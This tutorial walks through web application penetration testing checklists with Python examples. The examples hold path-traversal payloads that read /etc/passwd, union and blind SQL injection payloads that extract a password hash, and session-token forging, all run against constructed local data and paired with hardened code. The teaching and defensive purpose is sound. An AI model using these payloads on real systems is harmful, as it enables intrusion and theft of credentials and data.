Web Application Penetration Testing

Web application penetration testing involves four fundamental phases: information gathering, research and exploitation, reporting and recommendations, and remediation with ongoing support. These tests are performed primarily to keep the application's source code secure throughout its development lifecycle. Coding mistakes, specific requirements, or a lack of knowledge of cyber attack vectors are the main reasons for performing this kind of penetration test.

Why Are Web Application Pen Tests Performed?

Because of the enormous expansion of web applications, more and more resources are being spent on developing the software as well as configuring the applications to work properly in this new landscape.

This new frontier has, however, opened up another attack vector that malicious hackers can use for their own gain.

Considering that many web applications hold sensitive data, they must be kept secure at all times, especially since a lot of them are publicly exposed to the internet.

Performing web application penetration testing as part of your Software Development Life Cycle (SDLC) process is the most effective way of warding off web application weaknesses.


  • Information Gathering
  1. Retrieve and analyze the robots.txt file, using a tool such as GNU Wget.
  2. Determine the software version, database details, the technical components exposed in error messages, and bugs revealed by error codes, by requesting invalid pages.
  3. Perform techniques such as DNS reverse lookups, DNS zone transfers, and web-based DNS searches.
  4. Perform directory-style searching and vulnerability scanning, and probe for URLs, using tools such as Nmap and Nessus.
  5. Identify the entry points of the application using Burp Proxy, OWASP ZAP, TamperIE, WebScarab, or Tamper Data.
  6. Using a conventional fingerprinting tool such as Nmap or Amap, perform TCP/ICMP and service fingerprinting.
  7. By requesting common file extensions such as .ASP, .EXE, .HTML, and .PHP, test for recognized file types, extensions and directories.
  8. Analyze the source code of the accessible pages of the application front end.
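
The three reconnaissance steps above that work on captured data (mining robots.txt, reading the server banner from an error response, and generating extension probes) are easy to script once the responses are saved. The following is an added example, not code from the original article: the robots.txt body, the 404 response headers and the host name example.test are constructed, and nothing is fetched from the network.

```python
"""Reconnaissance helpers: robots.txt mining, banner fingerprinting and
extension probing. Added example; all sample data is constructed and no
network access is performed."""
import re
from urllib.parse import urljoin

# Constructed robots.txt, as a tester would retrieve it with wget/curl.
SAMPLE_ROBOTS = """User-agent: *
Disallow: /admin/
Disallow: /backup/
Disallow: /old-site/
Allow: /
Sitemap: https://example.test/sitemap.xml
"""

# Constructed raw response headers from a request for an invalid page.
SAMPLE_HEADERS = """HTTP/1.1 404 Not Found
Server: Apache/2.4.29 (Ubuntu)
X-Powered-By: PHP/7.2.24
Content-Type: text/html; charset=UTF-8
"""

COMMON_EXTENSIONS = (".php", ".asp", ".aspx", ".html", ".exe", ".bak", ".old")


def robots_disallowed(text):
    """Every Disallow path: the directories the site asks crawlers to skip,
    which are the first places a tester requests by hand."""
    paths = []
    for line in text.splitlines():
        key, _, value = line.partition(":")
        if key.strip().lower() == "disallow" and value.strip():
            paths.append(value.strip())
    return paths


def fingerprint(raw_headers):
    """Pull software and version hints out of the response headers."""
    hints = {}
    for line in raw_headers.splitlines()[1:]:  # skip the status line
        name, _, value = line.partition(":")
        if name.strip().lower() in ("server", "x-powered-by", "x-aspnet-version"):
            hints[name.strip()] = value.strip()
    return hints


def version_numbers(hints):
    """Bare version strings (e.g. '2.4.29') to look up against known bugs."""
    return re.findall(r"\d+\.\d+(?:\.\d+)?", " ".join(hints.values()))


def extension_probes(base, names):
    """URLs to request when testing which file types the server will serve."""
    return [urljoin(base, f"{n}{ext}") for n in names for ext in COMMON_EXTENSIONS]


if __name__ == "__main__":
    print("hidden paths:", robots_disallowed(SAMPLE_ROBOTS))
    hints = fingerprint(SAMPLE_HEADERS)
    print("banner:", hints, "versions:", version_numbers(hints))
    print("probes:", extension_probes("https://example.test/", ["index", "admin"])[:4])
```

Feed `extension_probes` the path names harvested from `robots_disallowed` and from the front-end source, and compare the status codes returned for each extension; a 403 where the others return 404 usually means the file exists.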
  • Authentication Testing
  1. Check whether it is possible to "reuse" the session after logout. Also check whether the application automatically logs a user out after a specific period of inactivity.
  2. Check whether any sensitive information remains stored in the browser cache.
  3. Check and attempt to reset the password, by social engineering, cracking the secret questions, and guessing.
  4. Check whether a "Remember my password" mechanism is implemented, by inspecting the HTML code of the login page.
  5. Check whether hardware devices communicate directly and independently with the authentication infrastructure using an additional communication channel.
  6. Test whether a CAPTCHA is present and whether it introduces authentication weaknesses.
  7. Check whether any weak security questions/answers are used.
  8. A successful SQL injection could lead to the loss of customer trust, and attackers can steal phone numbers, addresses, and credit card details. Placing a web application firewall in front of the application can filter out malicious SQL queries in the traffic.
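
Items 2 and 4 above (browser-cache exposure and the "remember me" mechanism) can both be checked from a captured response without touching the live application. The following is an added example and not code from the original article: the post-login response headers and the login form HTML are constructed, and the finding strings are this example's own.

```python
"""Authentication checks over captured responses: browser-cache exposure of
a post-login page, and 'remember me' / autocomplete handling in the login
form. Added example; the responses below are constructed."""
from html.parser import HTMLParser

# Constructed headers of a page shown after login (account details).
SAMPLE_ACCOUNT_PAGE_HEADERS = """HTTP/1.1 200 OK
Content-Type: text/html
Cache-Control: public, max-age=3600
"""

# Constructed login form.
SAMPLE_LOGIN_HTML = """<form method="post" action="/login">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="checkbox" name="remember_me" value="1"> Remember my password
  <input type="submit" value="Sign in">
</form>"""


def parse_headers(raw):
    headers = {}
    for line in raw.splitlines()[1:]:  # skip the status line
        name, _, value = line.partition(":")
        if name.strip():
            headers[name.strip().lower()] = value.strip()
    return headers


def cache_findings(raw):
    """Report when a post-login page may be retained by the browser or a
    shared cache: sensitive pages should send Cache-Control: no-store."""
    h = parse_headers(raw)
    directives = {d.strip().lower() for d in h.get("cache-control", "").split(",") if d.strip()}
    findings = []
    if "no-store" not in directives:
        findings.append("Cache-Control lacks no-store; page may persist in browser cache")
    if "public" in directives:
        findings.append("Cache-Control: public allows shared/proxy caching")
    if h.get("pragma", "").lower() != "no-cache":
        findings.append("no Pragma: no-cache for HTTP/1.0 caches")
    return findings


class LoginFormAudit(HTMLParser):
    """Collect <input> elements so the login form can be inspected."""

    def __init__(self):
        super().__init__()
        self.inputs = []

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.inputs.append(dict(attrs))


def login_form_findings(html):
    audit = LoginFormAudit()
    audit.feed(html)
    findings = []
    for field in audit.inputs:
        name = (field.get("name") or "").lower()
        if field.get("type") == "password" and (field.get("autocomplete") or "").lower() != "off":
            findings.append(f"password field '{name}' does not set autocomplete=off")
        if field.get("type") == "checkbox" and "remember" in name:
            findings.append(f"'remember me' mechanism present via field '{name}'")
    return findings


if __name__ == "__main__":
    for f in cache_findings(SAMPLE_ACCOUNT_PAGE_HEADERS) + login_form_findings(SAMPLE_LOGIN_HTML):
        print("-", f)
```

One caveat for the report: current browsers ignore `autocomplete=off` on login fields, so the finding documents the application's intent rather than a control that actually prevents credential storage; the presence of a "remember me" token is the more important item to follow up, since that token becomes a long-lived credential and needs the same scrutiny as the session cookie.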
  • Authorization Testing
  1. Test role and privilege manipulation to gain access to resources.
  2. Test for path traversal by performing input vector enumeration, and analyze the input validation functions present in the web application.
  3. Test for cookie and parameter tampering using web spider tools.
  4. Test for HTTP request tampering, and check whether it is possible to gain illegitimate access to reserved resources.
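
Item 2 above pairs a payload list with a look at the input validation function. The following added example (not code from the original article) does both: it enumerates traversal input vectors, including URL-encoded and double-encoded forms, and runs them against a naive file-path resolver beside a hardened one. The web root /var/www/html and the file names are constructed; no files are read.

```python
"""Path-traversal testing: a payload list, a vulnerable file-path resolver
and its hardened form, and a harness that reports which payloads escape the
web root. Added example; paths are constructed and never opened."""
import os
from typing import Optional
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"  # constructed document root

# Typical traversal input vectors, including encoded variants.
TRAVERSAL_PAYLOADS = [
    "../../../../etc/passwd",
    "..%2f..%2f..%2f..%2fetc%2fpasswd",          # URL-encoded slashes
    "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",   # encoded dots and slashes
    "..%252f..%252fetc%252fpasswd",              # double-encoded
    "....//....//etc/passwd",                    # survives naive '../' stripping
    "/etc/passwd",                               # absolute path
]


def vulnerable_resolve(web_root, user_path):
    """Naive join after one round of URL decoding: '..' segments and an
    absolute path both escape the root (os.path.join discards web_root
    when the second argument is absolute)."""
    return os.path.join(web_root, unquote(user_path))


def hardened_resolve(web_root, user_path) -> Optional[str]:
    """Decode fully, canonicalise, then verify the result is still inside
    web_root; return None (reject) otherwise."""
    decoded = unquote(unquote(user_path))  # collapse double encoding before checking
    root = os.path.realpath(web_root)
    target = os.path.realpath(os.path.join(root, decoded.lstrip("/")))
    if os.path.commonpath([root, target]) != root:
        return None
    return target


def run_traversal_tests(web_root, resolver):
    """Return the payloads for which the resolver lands outside web_root."""
    root = os.path.realpath(web_root)
    escaped = []
    for payload in TRAVERSAL_PAYLOADS:
        resolved = resolver(web_root, payload)
        if resolved is None:
            continue  # rejected by the resolver
        if os.path.commonpath([root, os.path.realpath(resolved)]) != root:
            escaped.append(payload)
    return escaped


if __name__ == "__main__":
    print("vulnerable resolver escapes on:", run_traversal_tests(WEB_ROOT, vulnerable_resolve))
    print("hardened resolver escapes on:", run_traversal_tests(WEB_ROOT, hardened_resolve))
```

The double-encoded and `....//` payloads do not escape the naive resolver here; they are in the list because they defeat other common filters (a single decode followed by a blacklist, or stripping of the literal string `../`), which is why input vector enumeration uses the whole list rather than one canonical `../` string.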
  • Configuration Management Testing
  1. Check directory and file enumeration, and review the server and application documentation. In addition, check the system and application admin interfaces.
  2. Analyze the web server banner and perform network scanning.
  3. Check and verify the presence of old documentation, backups and referenced files, for example source code, passwords and installation paths.
  4. Check and identify the ports associated with the SSL/TLS services, using Nmap and Nessus.
  5. Review the OPTIONS HTTP method using Netcat and Telnet.
  6. Test for HTTP methods and XST (Cross-Site Tracing) that could expose the credentials of legitimate users.
  7. Perform an application configuration management test to review the information in the source code, log files, and default error codes.
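
Items 5 and 6 above are usually done by typing an OPTIONS and a TRACE request into netcat or telnet and reading the reply. The following added example (not code from the original article) evaluates such replies once they are saved: it lists the methods advertised in Allow that a content site has no reason to expose, and checks whether a TRACE response echoes a cookie value back in its body. Both responses and the host example.test are constructed.

```python
"""HTTP method and Cross-Site Tracing (XST) checks over raw responses
captured with nc/telnet. Added example; the responses are constructed."""

# Constructed reply to:  OPTIONS / HTTP/1.1
SAMPLE_OPTIONS_RESPONSE = """HTTP/1.1 200 OK
Allow: GET, HEAD, POST, OPTIONS, TRACE, PUT, DELETE
Content-Length: 0
"""

# Constructed reply to:  TRACE / HTTP/1.1  sent with a Cookie header
SAMPLE_TRACE_RESPONSE = """HTTP/1.1 200 OK
Content-Type: message/http

TRACE / HTTP/1.1
Host: example.test
Cookie: SESSIONID=abc123def456
"""

SAFE_METHODS = {"GET", "HEAD", "POST", "OPTIONS"}


def split_response(raw):
    """Return (status line, header dict with lower-case names, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def risky_methods(options_raw):
    """Methods listed in Allow that should be disabled unless the
    application genuinely needs them (PUT/DELETE write content, TRACE
    enables XST, and non-standard verbs should be challenged)."""
    _, headers, _ = split_response(options_raw)
    allowed = {m.strip().upper() for m in headers.get("allow", "").split(",") if m.strip()}
    return sorted(allowed - SAFE_METHODS)


def xst_exposed(trace_raw, cookie_value):
    """TRACE echoes the request it received. If the cookie value comes back
    in the body, anything able to issue a TRACE and read the response can
    read a cookie that HttpOnly would otherwise hide from script."""
    status, _, body = split_response(trace_raw)
    return status.split()[1] == "200" and cookie_value in body


if __name__ == "__main__":
    print("risky methods:", risky_methods(SAMPLE_OPTIONS_RESPONSE))
    print("XST exposes cookie:", xst_exposed(SAMPLE_TRACE_RESPONSE, "abc123def456"))
```

Allow is only what the server chooses to advertise; send each method directly as well, since some servers answer OPTIONS conservatively but still accept PUT or TRACE. Current browsers refuse to issue TRACE from script, so a TRACE finding today is a server hardening item rather than a directly exploitable cookie theft.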
  • Session Management Testing
  1. Check the URLs in the restricted area to test for Cross-Site Request Forgery.
  2. Test for exposed session variables by examining encryption and reuse of session tokens, proxies and caching, and GET/POST handling.
  3. Collect a sufficient number of cookie samples, analyze the cookie generation algorithm, and forge a valid cookie to perform an attack.
  4. Test the cookie attributes using intercepting proxies such as Burp Proxy or OWASP ZAP, or traffic capture tools such as Tamper Data.
  5. Test for session fixation, to prevent the theft of a user's session (session hijacking).
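
Items 3 and 4 above are shown together in the following added example, which is not code from the original article. It collects a run of session tokens, looks for decodable structure and a sequential counter, forges the next token when the scheme allows it, and audits the attributes of a Set-Cookie line. The two token generators are constructed stand-ins for an application's session issuer (one deliberately weak, one drawn from the OS random source), and the Set-Cookie header is constructed.

```python
"""Session-token analysis and Set-Cookie attribute audit. Added example;
the token generators and the Set-Cookie line are constructed."""
import base64
import binascii
import secrets
from http.cookies import SimpleCookie


def weak_token(n):
    """Constructed weak scheme: base64(user:counter), with a counter that
    increases by one per login."""
    return base64.b64encode(f"alice:{1000 + n}".encode()).decode()


def strong_token(n):
    """Constructed strong scheme: 128 random bits from the OS CSPRNG."""
    return secrets.token_hex(16)


def decode_structure(token):
    """If the token is base64 of printable text, return that text."""
    try:
        text = base64.b64decode(token, validate=True).decode("ascii")
        return text if text.isprintable() else None
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyse_tokens(samples):
    """Return (findings, forged_next_token). The forged token is only
    produced when a visible counter makes the next value predictable."""
    findings = []
    forged = None
    decoded = [decode_structure(t) for t in samples]
    if all(decoded):
        findings.append("tokens are base64 of readable text, e.g. " + decoded[0])
        prefix, _, last = decoded[-1].rpartition(":")
        if last.isdigit():
            nums = [int(d.rpartition(":")[2]) for d in decoded]
            if all(b - a == 1 for a, b in zip(nums, nums[1:])):
                findings.append("trailing field is a sequential counter")
                forged = base64.b64encode(f"{prefix}:{int(last) + 1}".encode()).decode()
    if len(set(samples)) != len(samples):
        findings.append("duplicate tokens issued")
    return findings, forged


# Constructed Set-Cookie header as seen in an intercepting proxy.
SAMPLE_SET_COOKIE = "SESSIONID=abc123; Path=/; Expires=Fri, 01 Jan 2038 00:00:00 GMT"


def cookie_attribute_findings(set_cookie_header):
    """Flag a session cookie missing Secure, HttpOnly or SameSite, or one
    that persists on disk instead of ending with the browser session."""
    jar = SimpleCookie()
    jar.load(set_cookie_header)
    findings = []
    for name, morsel in jar.items():
        if not morsel["secure"]:
            findings.append(f"{name}: missing Secure")
        if not morsel["httponly"]:
            findings.append(f"{name}: missing HttpOnly")
        if not morsel["samesite"]:
            findings.append(f"{name}: missing SameSite")
        if morsel["expires"] or morsel["max-age"]:
            findings.append(f"{name}: persistent (Expires/Max-Age set)")
    return findings


if __name__ == "__main__":
    print(analyse_tokens([weak_token(i) for i in range(5)]))
    print(analyse_tokens([strong_token(i) for i in range(5)]))
    print(cookie_attribute_findings(SAMPLE_SET_COOKIE))
```

A real capture should be larger than five samples and should include tokens issued to different accounts at different times, so that fields tied to the user, the time or the server instance can be told apart. Absence of visible structure is not proof of strength; it only means the next test is a statistical one on a large sample.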
  • Data Validation Testing
  1. Perform source code analysis for JavaScript coding errors.
  2. Perform union query SQL injection testing, standard SQL injection testing, and blind SQL query testing, using tools such as sqlninja, sqldumper, SQL Power Injector, etc.
  3. Analyze the HTML code, and test for and exploit stored XSS, using tools such as XSS Proxy, Backframe, Burp Proxy, OWASP ZAP, and XSS Assistant.
  4. Perform LDAP injection testing for sensitive information about users and hosts.
  5. Perform IMAP/SMTP injection testing to access the backend mail server.
  6. Perform XPath injection testing for accessing confidential information.
  7. Perform XML injection testing to learn about the XML structure.
  8. Perform code injection testing to identify input validation errors.
  9. Perform buffer overflow testing for stack and heap memory information and application control flow.
  10. Test for HTTP splitting and smuggling of cookies and HTTP redirect information.
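
Item 2 above names union-query and blind SQL injection. The following added example (not code from the original article) shows both against a deliberately vulnerable search function, beside its parameterised form, using an in-memory SQLite database so it runs without any server. The tables, rows and the admin password hash are constructed.

```python
"""Union-based and boolean-blind SQL injection against a vulnerable query,
beside the parameterised version. Added example; schema and data are
constructed and live in an in-memory SQLite database."""
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price REAL);
        CREATE TABLE users(id INTEGER, username TEXT, password_hash TEXT);
        INSERT INTO products VALUES (1, 'widget', 9.99), (2, 'gadget', 19.99);
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return db


def search_vulnerable(db, term):
    """String concatenation: whatever the user types becomes SQL."""
    sql = f"SELECT name, price FROM products WHERE name LIKE '%{term}%'"
    return db.execute(sql).fetchall()


def search_hardened(db, term):
    """Parameterised query: the term is bound as data, never parsed as SQL."""
    sql = "SELECT name, price FROM products WHERE name LIKE ?"
    return db.execute(sql, (f"%{term}%",)).fetchall()


# Union query injection: close the string, append a SELECT with the same
# number of columns as the original, and comment out the trailing quote.
UNION_PAYLOAD = "' UNION SELECT username, password_hash FROM users--"


def blind_extract(query, length):
    """Boolean-blind extraction of the admin hash one hex digit at a time,
    using only whether the search returned any rows; nothing from the users
    table is ever echoed directly."""
    out = ""
    for pos in range(1, length + 1):
        for c in "0123456789abcdef":
            probe = (
                "widget' AND substr((SELECT password_hash FROM users "
                f"WHERE username='admin'),{pos},1)='{c}'--"
            )
            if query(probe):
                out += c
                break
    return out


if __name__ == "__main__":
    db = make_db()
    print("union, vulnerable:", search_vulnerable(db, UNION_PAYLOAD))
    print("union, hardened:  ", search_hardened(db, UNION_PAYLOAD))
    print("blind, vulnerable:", blind_extract(lambda t: search_vulnerable(db, t), 8))
    print("blind, hardened:  ", repr(blind_extract(lambda t: search_hardened(db, t), 8)))
```

The blind routine needs 16 requests per character in the worst case; the tools named in item 2 do the same thing with binary search on the character value and with timing-based variants for endpoints that return no visible difference at all. The hardened function returns nothing for every probe because the bound parameter is compared literally against product names.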
  • Denial of Service Testing
  1. Send a large number of requests that perform database operations, and observe any slowdown and new error messages.
  2. Perform manual source code analysis, and submit a range of inputs of varying lengths to the application.
  3. Test for SQL wildcard attacks for application information testing. Enterprise networks should choose the best DDoS attack prevention services to ensure DDoS attack protection for their network.
  4. Test user-specified object allocation, to find the maximum number of objects that the application can handle.
  5. Enter an extremely large number in an input field used by the application as a loop counter. Protect the site from future attacks, and also check your company's DDoS attack downtime cost.
  6. Use a script to automatically submit an extremely long value for the server to log the request.
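
Items 2 and 6 above both come down to submitting inputs of increasing length and watching whether processing time grows faster than the input. The following is an added example, not code from the original article: the endpoint is a constructed stand-in for an application handler (a field validated with a nested-quantifier regular expression, which backtracks exponentially on a non-matching input), and the sweep is run in-process rather than over HTTP.

```python
"""Length-sweep denial-of-service probe: time an endpoint on inputs of
growing length and flag super-linear growth. Added example; the endpoint is
a constructed stand-in for an application handler."""
import re
import time

# Constructed endpoint: validates a name field with a nested-quantifier
# pattern. 'aaaa...a!' never matches and forces exponential backtracking.
NAME_PATTERN = re.compile(r"^(a+)+$")


def constructed_endpoint(payload):
    return NAME_PATTERN.match(payload) is not None


def time_request(endpoint, payload):
    """Seconds spent handling one payload."""
    start = time.perf_counter()
    endpoint(payload)
    return time.perf_counter() - start


def length_sweep(endpoint, lengths, build=lambda n: "a" * n + "!"):
    """[(length, seconds)] for each input length, shortest first."""
    return [(n, time_request(endpoint, build(n))) for n in sorted(lengths)]


def growth_factor(measurements):
    """How much the time per input character grew from the shortest to the
    longest payload; about 1.0 for a handler that scales linearly."""
    (n0, t0), (n1, t1) = measurements[0], measurements[-1]
    return (t1 / n1) / max(t0 / n0, 1e-9)


def superlinear(endpoint, lengths=(12, 14, 16, 18, 20), threshold=4.0):
    """True when time per character grows more than `threshold` times across
    the sweep, i.e. a longer payload costs the server disproportionately more."""
    return growth_factor(length_sweep(endpoint, lengths)) > threshold


if __name__ == "__main__":
    for n, t in length_sweep(constructed_endpoint, (12, 14, 16, 18, 20)):
        print(f"len={n:3d}  {t * 1000:8.2f} ms")
    print("superlinear:", superlinear(constructed_endpoint))
```

Against a live target, grow the lengths gradually and stop at the first clearly super-linear step rather than jumping to the longest value; the point of the test is to find the threshold and report it, not to take the service down. The same sweep, with the loop counter or the object count as the varied input instead of the length, covers items 4 and 5.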

